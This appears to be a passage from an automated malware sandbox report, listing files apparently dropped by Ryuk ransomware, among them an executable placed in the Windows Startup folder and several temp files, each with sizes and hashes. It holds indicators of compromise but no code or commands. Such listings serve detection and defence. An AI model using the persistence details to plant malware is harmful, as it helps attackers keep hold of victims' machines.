SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
96646b6ffcf3af7eb064254bce631a92

SHA1
39b6ce490f09e18700c2dfd7e9c5d0f838c18015

SHA256
083c5e0e62549bba38194e0255cab45e22fcbbc616eccf2cac65b5d06448325e

SHA512
62549bd813666a1ca1e6b0b134e23b5b7b2f97b41bf714cdbe255d43e3a29f49c77dae6067654c7ddfb6795d2cb21faffb61f90e9dae2d02a24ac8a0b7217f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit